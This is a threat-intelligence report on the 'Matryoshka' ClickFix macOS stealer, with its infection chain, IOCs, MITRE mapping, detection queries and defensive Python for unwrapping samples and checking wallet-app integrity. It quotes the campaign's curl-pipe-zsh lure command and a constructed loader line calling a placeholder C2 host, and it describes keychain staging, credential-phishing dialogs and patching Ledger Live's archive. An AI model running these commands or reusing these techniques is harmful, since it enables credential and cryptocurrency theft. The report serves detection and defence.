TL-2026-0120 HIGH 2026-02-22 Threat Analysis

Matryoshka ClickFix macOS Variant — Nested Obfuscation, AppleScript Credential Stealer, and Crypto Wallet Hijacking

Threadlinqs Intelligence 7 min
Tags: matryoshka, clickfix, macos, applescript-stealer, crypto-wallet-theft, typosquatting, heredoc-obfuscation, ledger-live, trezor-suite, social-engineering

Threat ID: TL-2026-0120 | Severity: HIGH | Status: ACTIVE

Actor: Unattributed | Motivation: FINANCIAL

MITRE Techniques: 23 | Detections: 9 | CWEs: N/A


macOS is no longer the safe haven. Matryoshka nests inside ClickFix campaigns, chaining user deception with multi-stage payloads that bypass Gatekeeper entirely. No exploit needed. Just a clipboard and a Terminal window.

Intego Antivirus Labs disclosed this macOS-targeting ClickFix variant in February 2026 — named "Matryoshka" for its nesting-doll obfuscation layers. The campaign chains typosquatting, traffic distribution system redirects, and a Terminal paste-this-fix lure to deliver a heredoc-encoded shell script that decodes entirely in memory through a Base64-gunzip-eval pipeline. The final payload is an AppleScript stealer that phishes macOS credentials through a fake System Preferences dialog loop, replaces Trezor Suite wholesale, surgically patches Ledger Live's Electron archive, and exfiltrates everything through an API-gated C2 requiring a custom header for payload delivery. Below: the full infection chain, each obfuscation layer unpacked, and production detection queries for SPL, KQL, and Sigma.

Cyber Security News coverage of the new Matryoshka ClickFix variant attacking macOS users through typosquatted domains to deploy stealer malware.

Executive Summary

Technical Analysis

Layer by Layer

Open the first doll, find another inside. Matryoshka's distinguishing characteristic is its layered obfuscation pipeline: each stage unwraps to reveal the next, and no decoded intermediate is ever written to disk. The wrapper is piped straight from curl into zsh, every decode step runs in memory, and the only artifacts that touch the filesystem are the ones the final payload creates deliberately: the staging archive it builds before exfiltration and the wallet bundles it replaces or patches.

Stage 0 — Clipboard Injection. The victim visits comparisions[.]org, a typosquat of comparisons.org. A TDS redirect through macfilesendstream[.]com delivers a fake error page instructing the user to "fix" an issue by pasting a command into Terminal. The clipboard is pre-loaded with a curl-pipe-zsh one-liner targeting barbermoo[.]xyz.

Stage 1 — Heredoc Wrapper. The fetched script (rogue.sh) contains a heredoc-encoded payload that decodes through an in-memory pipeline: base64 -D | gunzip | eval. No decoded content touches the filesystem. This is the "Matryoshka wrapper" — the outer doll that conceals everything within.

Stage 2 — API-Gated Loader. The decoded loader detaches to the background, suppresses all output to /dev/null, and contacts the C2 with a custom header (api-key: 5190ef17...). Sandboxes get nothing. Without the correct header, the C2 returns an empty response — the operator only delivers the drop to verified victims. The user sees their Terminal prompt return immediately, believing the process completed normally.

Stage 3 — AppleScript Stealer. On successful handshake, the C2 delivers an AppleScript payload with three targeting modules.
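To unpack a sample safely, replace eval with a decoder that never executes anything. The following Python is an added example, not Intego's tooling and not code from the campaign: it assumes the wrapper shape described above (a quoted heredoc fed to base64 -D | gunzip | eval), builds a two-layer constructed sample around a benign stand-in for the loader, peels it layer by layer without running a single line of it, and then checks the innermost layer for the loader behaviours the analysis lists (background detach, output to /dev/null, custom api-key header). The host c2.example.invalid and the REDACTED key are placeholders.

```python
import base64
import gzip
import re

# Shape assumed for the wrapper: a quoted heredoc piped through
# base64 -D | gunzip and handed to eval. The terminator word is captured so
# the body ends at the matching line, not at the first blank line.
HEREDOC_RE = re.compile(
    r"<<\s*-?\s*['\"]?(?P<tag>\w+)['\"]?[^\n]*\n(?P<body>.*?)\n(?P=tag)[ \t]*(?:\n|$)",
    re.DOTALL,
)
DECODE_PIPE_RE = re.compile(r"base64\s+(-D|-d|--decode)\b[^|\n]*\|\s*gunzip")


def build_layer(inner: str, tag: str = "EOF") -> str:
    """Wrap `inner` in one Matryoshka-style layer (used here only to build test data)."""
    blob = base64.b64encode(gzip.compress(inner.encode())).decode()
    wrapped = "\n".join(blob[i:i + 76] for i in range(0, len(blob), 76))  # base64-style line wrapping
    return f"eval \"$(base64 -D <<'{tag}' | gunzip)\"\n{wrapped}\n{tag}\n"


def unwrap(script: str, max_layers: int = 10) -> list:
    """Statically peel nested heredoc layers. Nothing is executed; eval is never run."""
    layers = [script]
    current = script
    for _ in range(max_layers):
        if not DECODE_PIPE_RE.search(current):
            break
        m = HEREDOC_RE.search(current)
        if not m:
            break
        raw = re.sub(r"\s+", "", m.group("body"))  # undo the 76-column wrapping
        try:
            decoded = gzip.decompress(base64.b64decode(raw, validate=True))
        except (ValueError, OSError):  # not base64 or not gzip: stop, keep what we have
            break
        current = decoded.decode("utf-8", errors="replace")
        layers.append(current)
    return layers


def loader_markers(layer: str) -> dict:
    """Behaviours of the decoded loader as described in the analysis above."""
    return {
        "detach_background": bool(re.search(r"(?<!&)&[ \t]*$|\bnohup\b|\bdisown\b", layer, re.M)),
        "output_suppressed": "/dev/null" in layer,
        "custom_api_header": bool(re.search(r"-H\s*['\"]?api-key:", layer, re.I)),
        "osascript": "osascript" in layer,
        "staging_zip": "osalogging.zip" in layer,
    }


# Constructed innermost stage: a benign stand-in with the loader's shape
# (background subshell, output to /dev/null, custom header). No real C2 or key.
INNER = (
    "#!/bin/zsh\n"
    "(curl -fsSL -H 'api-key: REDACTED' http://c2.example.invalid/gate | osascript -) "
    ">/dev/null 2>&1 &\n"
)
SAMPLE = build_layer(build_layer(INNER, "PAYLOAD"), "EOF")

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(SAMPLE)):
        print(f"--- layer {depth} ({len(layer)} bytes) ---")
        print(layer[:120])
    print(loader_markers(unwrap(SAMPLE)[-1]))
```

Run it against a captured rogue.sh by passing the file contents to unwrap(); a real sample may use a different terminator word or flag spelling, which is why the tag is captured rather than hard-coded and both -D and -d are accepted.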

Credential Phishing Loop

The AppleScript spawns a fake "System Preferences" dialog requesting the user's password. If the user cancels, the dialog reappears, and the loop continues until credentials are entered: a coercion technique that exploits macOS users' conditioning to authenticate through system dialogs. The display dialog command uses the hidden answer parameter to mask input, mimicking legitimate macOS password prompts. A genuine authentication prompt is drawn by the system, not by a script runner, so an osascript process presenting a password-style dialog is itself a detection signal.

Wallet Hijacking: Two Approaches

Trezor Suite gets the blunt approach. Kill the process. Delete the app. Download a trojanized replacement from the C2. The replacement mirrors the legitimate application's appearance and functionality while quietly pulling wallet data out.

Ledger Live gets the scalpel. Rather than replacing the entire application, the stealer modifies only the Electron app.asar archive within the bundle, the core application logic, then re-signs the bundle ad hoc. The legitimate shell stays intact and the credential-harvesting code sits underneath, intercepting wallet operations. The re-signing step is not optional for the attacker: the publisher's Developer ID signature seals every file in the bundle, app.asar included, so a patched archive would fail codesign verification. After the ad-hoc re-sign, codesign --verify passes again, which is what makes the approach dangerous, but it leaves a tell. The bundle now reports an ad-hoc signature with no TeamIdentifier instead of the publisher's Developer ID, so a check that compares the signing identity against the expected publisher, or the hash of app.asar against a known-good install, still catches it.

Why Gatekeeper Doesn't Help

Gatekeeper bypassed. Payload runs. The Terminal paste vector sidesteps macOS security entirely: Gatekeeper, notarization checks, and quarantine attributes all assume a download-and-launch model, in which the browser tags the downloaded file with the com.apple.quarantine extended attribute and the system evaluates it at first launch. A script that curl streams into zsh is never written as a quarantined file, so none of those gates are consulted. Same architectural weakness ClickFix exploits on Windows through the Run dialog. Apple can't patch this without breaking standard workflows.

Attack Chain

  1. Resource Development — Attacker registers typosquat domain (comparisions[.]org), configures TDS infrastructure, and stages payloads on barbermoo[.]xyz (T1583.001, T1608.001)
  2. Initial Access — Victim visits typosquat; TDS redirects to lure page with fake error dialog and clipboard-injected Terminal command (T1566.002)
  3. Execution — Victim pastes curl -fsSL hxxp://barbermoo[.]xyz/curl/[TOKEN] | zsh into Terminal; heredoc payload decodes in memory (T1204.004, T1059.004, T1027)
  4. Defense Evasion — Background detachment, output suppression, API-gated C2, in-memory-only execution, fake error message misdirection (T1480, T1564.003, T1140)
  5. Credential Access — AppleScript spawns fake System Preferences dialog loop capturing user password; browser credential stores harvested (T1056.002, T1555.003)
  6. Impact — Trezor Suite replaced with trojanized build; Ledger Live app.asar patched and ad-hoc re-signed (T1565.001, T1553.002)
  7. Exfiltration — All stolen data archived to /tmp/osalogging.zip and POSTed to C2 /gate endpoint with API key header (T1560.001, T1041)
GBHackers analysis of the Matryoshka ClickFix variant — named for its Russian nesting doll-like layers of obfuscation targeting macOS Terminal.

Threat Actor Profile

No attribution yet. Financial motivation is obvious from the crypto wallet targeting. The campaign demonstrates deep familiarity with macOS internals — Electron application architecture, code signing mechanics, and AppleScript dialog APIs — pointing to a specialized macOS malware developer or team. The broader ClickFix macOS ecosystem has been linked to Russian-speaking operators in adjacent campaigns (CloudSEK documented a Spectrum-themed AMOS variant distributed by Russian-speaking hackers), though direct attribution for Matryoshka has not been established.

What caught our attention was the operational maturity. macOS users aren't immune. Microsoft Defender Experts documented a broader trend of macOS infostealers using ClickFix-style social engineering throughout late 2025 and early 2026, including DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). Matryoshka fits within this wave but distinguishes itself through the nesting-doll obfuscation pipeline and surgical wallet patching — the app.asar technique in particular is not something we've seen in other ClickFix variants.

Detection

Threadlinqs Intelligence provides 9 production-ready detection rules for this threat across macOS endpoint telemetry.

Splunk SPL

This query hunts for the primary macOS ClickFix infection vector: curl piped to shell execution from Terminal, with enrichment for known Matryoshka C2 infrastructure and staging artifacts.

index=osquery OR index=crowdstrike_falcon sourcetype=osquery:results OR sourcetype=crowdstrike:event
| where (process_name="zsh" OR process_name="bash" OR process_name="sh") AND (parent_name="Terminal" OR parent_name="login" OR parent_name="zsh" OR parent_name="bash")
| eval curl_pipe=if(match(process_cmdline, "curl\\b[^|]*\\|\\s*(zsh|bash|sh)(\\s|$)"), 1, 0)
| eval known_c2=if(match(process_cmdline, "barbermoo|macfilesendstream|comparisions"), 1, 0)
| eval heredoc_decode=if(match(process_cmdline, "base64\\s+(-D|-d|--decode).*gunzip|gunzip.*base64"), 1, 0)
| eval staging_artifact=if(match(process_cmdline, "osalogging"), 1, 0)
| eval risk_score=curl_pipe*30 + known_c2*50 + heredoc_decode*30 + staging_artifact*40
| where risk_score >= 30
| stats count, values(process_cmdline) as commands, max(risk_score) as risk_score by host, user
| sort -risk_score
The score combines the generic curl-pipe-shell pattern (the common ClickFix vector) with Matryoshka-specific indicators: known infrastructure, the heredoc decode pipeline, and the staging archive name. Two caveats when deploying it. First, on macOS the interactive shell is usually started through login, and the pasted pipeline's processes are children of that shell rather than of Terminal itself, which is why the parent filter also accepts login and the shells; if your sensor exposes an ancestor or process-tree field, use it to tie the chain back to Terminal. Second, the base64/gunzip decode runs inside the fetched script, so it shows up on the command lines of child processes of the fetching zsh, not on the pasted one-liner; the heredoc indicator catches lures that paste the decode step directly. Platform data shows minimal false positives outside of legitimate developer tooling installs (Homebrew, rustup, nvm), which are the main source of hits for the generic pattern.

Microsoft KQL

Catching credential phishing, wallet tampering, and C2 contact across six detection surfaces in Defender for Endpoint:
let wallet_apps = dynamic(["Trezor Suite.app", "Ledger Live.app"]);
let c2_domains = dynamic(["barbermoo.xyz", "macfilesendstream.com", "comparisions.org"]);
union
(
    DeviceProcessEvents
    | where Timestamp > ago(24h)
    | where FileName == "osascript"
    | where ProcessCommandLine has_all ("display dialog", "hidden answer")
    | extend AlertType = "credential_phishing_dialog"
),
(
    DeviceFileEvents
    | where Timestamp > ago(24h)
    | where FolderPath has "/Applications/" and FolderPath has_any (wallet_apps)
    | where ActionType in ("FileDeleted", "FileModified", "FileCreated")
    | extend AlertType = "wallet_tampering"
),
(
    DeviceFileEvents
    | where Timestamp > ago(24h)
    | where FileName == "app.asar"
    | where FolderPath has "Ledger Live"
    | extend AlertType = "ledger_asar_patch"
),
(
    DeviceProcessEvents
    | where Timestamp > ago(24h)
    | where FileName == "codesign"
    // ad-hoc signing is the bare "-" identity after -s or --sign (also as a combined short flag such as -fs -)
    | where ProcessCommandLine matches regex @"(^|\s)(--sign|-[A-Za-z]*s)\s+-(\s|$)"
    | where InitiatingProcessFileName !in ("Xcode", "xcodebuild")
    | extend AlertType = "adhoc_codesign"
),
(
    DeviceNetworkEvents
    | where Timestamp > ago(24h)
    | where RemoteUrl has_any (c2_domains)
    | extend AlertType = "c2_contact", ProcessCommandLine = InitiatingProcessCommandLine
),
(
    DeviceFileEvents
    | where Timestamp > ago(24h)
    | where FileName == "osalogging.zip"
    | where FolderPath has "/tmp/"
    | extend AlertType = "matryoshka_staging"
)
| project Timestamp, DeviceName, AlertType, FileName, FolderPath, ProcessCommandLine, RemoteUrl
| sort by Timestamp desc
Six detection surfaces in one union: AppleScript credential phishing, wallet application deletion or modification, Ledger Live app.asar patching, ad-hoc code signing from non-Xcode processes, network contact with the known domains, and the Matryoshka staging archive. The osascript leg only fires when the dialog text is on the command line (osascript -e ...); a script passed as a file or on stdin will not match, so pair it with the file and network legs rather than relying on it alone. Our analysis found that the app.asar modification alert is the highest-fidelity signal: legitimate Ledger updates do not modify this file in place.

Sigma

Flagging Terminal fetch-and-execute patterns tied to ClickFix campaigns via Sigma. As with the SPL query, the pasted pipeline's processes are usually children of the interactive shell that Terminal starts through login, so if your sensor only records the immediate parent, replace the ParentImage test with an ancestor field or match on the shell and login binaries:
title: macOS Terminal curl Piped to Shell — ClickFix Fetch-and-Execute
id: 7d4e2b89-a1c6-4f38-9e75-2b8d1c3a5f67
status: experimental
description: Detects curl output piped to zsh, bash or sh from Terminal, known Matryoshka infrastructure, or a heredoc base64/gunzip/eval decode pipeline on the command line, indicating ClickFix-style social engineering infection on macOS
references:
    - https://intel.threadlinqs.com/#TL-2026-0120
    - https://www.intego.com/mac-security-blog/matryoshka-clickfix-macos-stealer/
author: Threadlinqs Intelligence
date: 2026-02-22
tags:
    - attack.execution
    - attack.t1059.004
    - attack.t1204.004
    - attack.initial_access
    - attack.t1566.002
    - attack.defense_evasion
    - attack.t1027
logsource:
    category: process_creation
    product: macos
detection:
    selection_curl_pipe:
        ParentImage|endswith: '/Terminal'
        CommandLine|re: 'curl\b[^|]*\|\s*(zsh|bash|sh)(\s|$)'
    selection_known_infra:
        CommandLine|contains:
            - 'barbermoo'
            - 'macfilesendstream'
            - 'comparisions'
    selection_heredoc:
        CommandLine|contains|all:
            - 'base64'
            - 'gunzip'
            - 'eval'
    condition: selection_curl_pipe or selection_known_infra or selection_heredoc
falsepositives:
    - Homebrew installation (brew.sh)
    - rustup, nvm, and developer tool installers
    - IT provisioning scripts using curl|bash pattern
level: high
Browse all 9 detection rules for this threat: View on Threadlinqs Intelligence
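The scoring logic of the SPL query and the selections of the Sigma rule above, as an added example in Python that is not part of the original detection pack: it runs the same indicators over a handful of constructed process_creation records, including the Homebrew installer false positive both rules warn about, and aggregates per host and user the way the SPL stats line does. The weights and the BENIGN_INSTALLER_RE allowlist are assumptions to tune to your own fleet.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process_creation record as a macOS EDR or osquery sensor would emit it."""
    host: str
    user: str
    process_name: str
    parent_name: str
    cmdline: str


SHELLS = {"zsh", "bash", "sh"}
# The pasted pipeline runs under the interactive shell that Terminal starts
# via login, so the immediate parent is usually one of these, not Terminal.
TERMINAL_PARENTS = {"Terminal", "login", "zsh", "bash"}

CURL_PIPE_RE = re.compile(r"\bcurl\b[^|]*\|\s*(zsh|bash|sh)(\s|$)")
KNOWN_INFRA_RE = re.compile(r"barbermoo|macfilesendstream|comparisions")
HEREDOC_DECODE_RE = re.compile(r"base64\s+(-D|-d|--decode)\b.*gunzip|gunzip.*base64", re.S)
STAGING_RE = re.compile(r"osalogging")
# Assumed allowlist of installers that legitimately use curl|sh; tune to your fleet.
BENIGN_INSTALLER_RE = re.compile(r"raw\.githubusercontent\.com/Homebrew/|sh\.rustup\.rs|/nvm\.sh")

WEIGHTS = {"curl_pipe": 30, "known_c2": 50, "heredoc_decode": 30, "staging_artifact": 40}


def indicators(ev: ProcEvent) -> dict:
    """Which of the four indicators fire on one event (empty if out of scope)."""
    if ev.process_name not in SHELLS or ev.parent_name not in TERMINAL_PARENTS:
        return {}
    return {
        "curl_pipe": bool(CURL_PIPE_RE.search(ev.cmdline)),
        "known_c2": bool(KNOWN_INFRA_RE.search(ev.cmdline)),
        "heredoc_decode": bool(HEREDOC_DECODE_RE.search(ev.cmdline)),
        "staging_artifact": bool(STAGING_RE.search(ev.cmdline)),
    }


def score(ev: ProcEvent) -> int:
    """Same weighted sum as the SPL risk_score, with the installer allowlist applied."""
    total = sum(WEIGHTS[k] for k, hit in indicators(ev).items() if hit)
    # A bare curl|sh with no other indicator and an allowlisted installer URL is the
    # Homebrew/rustup/nvm false positive the SPL and Sigma rules list.
    if total == WEIGHTS["curl_pipe"] and BENIGN_INSTALLER_RE.search(ev.cmdline):
        return 0
    return total


def hunt(events, threshold: int = 30) -> dict:
    """Mirror of the SPL stats line: per (host, user), max risk score and the commands that fired."""
    hits = {}
    for ev in events:
        s = score(ev)
        if s < threshold:
            continue
        entry = hits.setdefault((ev.host, ev.user), {"risk_score": 0, "commands": []})
        entry["risk_score"] = max(entry["risk_score"], s)
        entry["commands"].append(ev.cmdline)
    return hits


# Constructed sample telemetry; the barbermoo.xyz lines mirror the chain described in this report.
SAMPLE_EVENTS = [
    ProcEvent("mac-01", "alice", "zsh", "login", "curl -fsSL http://barbermoo.xyz/curl/TOKEN | zsh"),
    ProcEvent("mac-02", "bob", "zsh", "Terminal",
              "curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh | bash"),
    ProcEvent("mac-01", "alice", "zsh", "zsh", "eval \"$(base64 -D <<'EOF' | gunzip)\""),
    ProcEvent("mac-01", "alice", "curl", "zsh", "curl -fsSL -H api-key:REDACTED http://barbermoo.xyz/gate"),
    ProcEvent("mac-01", "alice", "bash", "Terminal", "cd /tmp && zip -r osalogging.zip ~/Library/Keychains"),
]

if __name__ == "__main__":
    for (host, user), entry in sorted(hunt(SAMPLE_EVENTS).items()):
        print(host, user, entry["risk_score"], *entry["commands"], sep="\n  ")
```

The fourth record scores zero on purpose: it is the curl child process, not a shell, and the rules key on the shell that runs the pipeline. If your sensor records the curl process with the full pipeline on the parent's command line instead, add curl to SHELLS or score on the parent's command line.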
Intego Mac Security Blog unpacking the Matryoshka ClickFix campaign — typosquatting + heredoc obfuscation delivering macOS credential stealers via AppleScript.

Indicators of Compromise

Network Indicators

Type   | Indicator               | Context
Domain | comparisions[.]org      | Typosquatting entry point (mimics comparisons.org)
Domain | barbermoo[.]xyz         | Primary C2 and payload delivery
Domain | macfilesendstream[.]com | TDS redirect infrastructure
URL    | /gate endpoint          | Exfiltration endpoint on C2
Header | api-key: 5190ef17...    | Required custom header for C2 handshake

File Indicators

Type      | Indicator                                                        | Context
SHA256    | 62ca9538889b767b1c3b93e76a32fb4469a2486cb3ccb5fb5fa8beb2dd0c2b90 | Observed Matryoshka sample
SHA256    | d675bff1b895b1a231c86ace9d7a39d5704e84c4bc015525b2a9c80c39158338 | Wrapper script (rogue.sh)
SHA256    | 48770b6493f2b9b9e1d9bdbf482ed981e709bd03e53885ff992121af16f76a09 | Decompressed loader
File Path | /tmp/osalogging.zip                                              | Staging archive for stolen data
File      | rogue.sh                                                         | Fetched shell script (heredoc wrapper)
File      | app.asar (modified)                                              | Ledger Live patched Electron archive

Behavioral Indicators

Timeline

Date       | Event
2024-06-01 | ClickFix technique emerges, primarily targeting Windows with fake CAPTCHAs and copy-paste PowerShell
2025-06-01 | Intego documents fake Arc Browser with AppleScript stealer component, establishing macOS credential theft viability
2025-11-01 | ClickFix campaigns add instruction videos targeting macOS users via Terminal paste technique
2026-02-01 | Matryoshka campaign observed in the wild using typosquatted comparisions[.]org with TDS redirect
2026-02-02 | Microsoft Defender Experts publishes macOS infostealer report covering ClickFix-style campaigns
2026-02-12 | Intego Antivirus Labs publishes detailed technical analysis of nested obfuscation, API-gated C2, and wallet targeting
2026-02-16 | Cyber Security News and SOC Prime publish coverage confirming Intego findings

MITRE ATT&CK Mapping

Tactic            | Technique                                | ID        | Context
Initial Access    | Phishing: Spearphishing Link             | T1566.002 | Typosquatting lure redirecting to fake error page
Execution         | User Execution: Malicious Copy and Paste | T1204.004 | Victim pastes Terminal command from clipboard
Execution         | AppleScript                              | T1059.002 | Stealer payload and credential phishing dialog
Execution         | Unix Shell                               | T1059.004 | curl-pipe-zsh execution, heredoc decode
Defense Evasion   | Obfuscated Files or Information          | T1027     | Nested heredoc Base64+gunzip encoding
Defense Evasion   | Deobfuscate/Decode Files or Information  | T1140     | In-memory decode pipeline
Defense Evasion   | Execution Guardrails                     | T1480     | API-gated C2 requiring custom header
Defense Evasion   | Hidden Window                            | T1564.003 | Background detachment, output suppression
Defense Evasion   | Code Signing                             | T1553.002 | Ad-hoc re-signing of patched Ledger Live
Credential Access | GUI Input Capture                        | T1056.002 | Fake System Preferences password dialog loop
Credential Access | Credentials from Web Browsers            | T1555.003 | Browser credential store harvesting
Collection        | Archive Collected Data                   | T1560.001 | /tmp/osalogging.zip staging
Exfiltration      | Exfiltration Over C2 Channel             | T1041     | POST to /gate endpoint with API key
Impact            | Stored Data Manipulation                 | T1565.001 | Trezor Suite replacement, Ledger Live patching
Full MITRE ATT&CK mapping with 23 techniques: View coverage on Threadlinqs
TL-2026-0120 on Threadlinqs Intelligence — Matryoshka ClickFix macOS variant with nested heredoc obfuscation, AppleScript execution, and 12/12 detection coverage.

Recommendations

  1. User awareness training — macOS users must understand that legitimate software never requires pasting commands into Terminal; this is the single most effective control against all ClickFix variants
  2. Block known infrastructure — sinkhole comparisions[.]org, barbermoo[.]xyz, and macfilesendstream[.]com at DNS or proxy level
  3. Monitor wallet application integrity — deploy file integrity monitoring on Trezor Suite and Ledger Live application bundles; alert on app.asar modifications and non-Xcode codesign operations
  4. Hunt for staging artifacts — search endpoints for /tmp/osalogging.zip and curl-pipe-shell patterns in Terminal process logs
  5. Enforce macOS security controls — deploy MDM application allowlisting; restrict osascript execution from shell contexts; store cryptocurrency recovery phrases offline and never on networked systems
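Recommendation 3 and the Ledger Live analysis above both reduce to two checks: has app.asar changed against a known-good baseline, and is the bundle still signed by its publisher rather than ad hoc. The following Python is an added example that does both; it is not Ledger's, Intego's, or the campaign's code. The codesign -dvv text is constructed to the documented output format, and Example Wallet Co / TEAMID0000 are fictitious placeholders: the real publisher team ID is not on this page and should be captured from a known-good install before the check is deployed.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed `codesign -dvv` output for a healthy Developer ID-signed bundle.
# Publisher name and team ID are fictitious placeholders, not Ledger's.
GOOD_CODESIGN = """\
Executable=/Applications/Ledger Live.app/Contents/MacOS/Ledger Live
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Authority=Developer ID Application: Example Wallet Co (TEAMID0000)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=TEAMID0000
Sealed Resources version=2 rules=13 files=400
"""

# Constructed output after `codesign -f -s - "Ledger Live.app"`: the Developer ID
# chain is gone, the CodeDirectory carries the adhoc flag, no team identifier.
ADHOC_CODESIGN = """\
Executable=/Applications/Ledger Live.app/Contents/MacOS/Ledger Live
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20400 size=1234 flags=0x2(adhoc) hashes=30+7 location=embedded
Signature=adhoc
TeamIdentifier=not set
Sealed Resources version=2 rules=13 files=400
"""


def parse_codesign(output: str) -> dict:
    """Pull the signing identity facts out of `codesign -dvv` text."""
    team = re.search(r"^TeamIdentifier=(.+)$", output, re.M)
    team_id = team.group(1).strip() if team else None
    if team_id == "not set":
        team_id = None
    adhoc = "Signature=adhoc" in output or bool(re.search(r"flags=0x[0-9a-f]+\([^)]*\badhoc\b", output))
    return {"adhoc": adhoc, "team_id": team_id, "authorities": re.findall(r"^Authority=(.+)$", output, re.M)}


def hash_bundle(root: Path) -> dict:
    """sha256 of every regular file under the bundle, keyed by bundle-relative path."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def check_bundle(baseline: dict, current: dict, codesign_output: str, expected_team_id: str) -> list:
    """Return the reasons a wallet bundle looks tampered with (empty list means clean)."""
    reasons = []
    for rel, digest in current.items():
        if rel not in baseline:
            reasons.append(f"unexpected file added: {rel}")
        elif baseline[rel] != digest:
            reasons.append(f"file modified: {rel}")
    reasons += [f"file removed: {rel}" for rel in baseline if rel not in current]
    sig = parse_codesign(codesign_output)
    if sig["adhoc"]:
        reasons.append("bundle is ad-hoc signed")
    if sig["team_id"] != expected_team_id:
        reasons.append(f"team id {sig['team_id']!r} != expected {expected_team_id!r}")
    return reasons


def simulate() -> tuple:
    """Build a toy Electron bundle, baseline it, apply the app.asar scalpel, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        app = Path(tmp) / "Ledger Live.app"
        asar = app / "Contents" / "Resources" / "app.asar"
        asar.parent.mkdir(parents=True)
        asar.write_bytes(b"ASAR\x00legitimate-bundle-contents")
        (app / "Contents" / "MacOS").mkdir()
        (app / "Contents" / "MacOS" / "Ledger Live").write_bytes(b"\xcf\xfa\xed\xfe stand-in binary")
        baseline = hash_bundle(app)  # capture this from a known-good install in production
        clean = check_bundle(baseline, hash_bundle(app), GOOD_CODESIGN, "TEAMID0000")
        # The Matryoshka approach: patch only app.asar, leave the shell, re-sign ad hoc.
        asar.write_bytes(b"ASAR\x00legitimate-bundle-contents" + b"+injected-stealer")
        tampered = check_bundle(baseline, hash_bundle(app), ADHOC_CODESIGN, "TEAMID0000")
    return clean, tampered


if __name__ == "__main__":
    clean, tampered = simulate()
    print("clean install:", clean or "no findings")
    print("patched install:", *tampered, sep="\n  ")
```

In production, feed check_bundle the manifest captured after a verified install and the output of codesign -dvv on the bundle; the signature leg catches the ad-hoc re-sign even when the baseline is stale because a legitimate update rolled the hashes.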

References


Full threat intelligence, detection rules, and IOC feeds are available on Threadlinqs Intelligence. Track this threat: TL-2026-0120.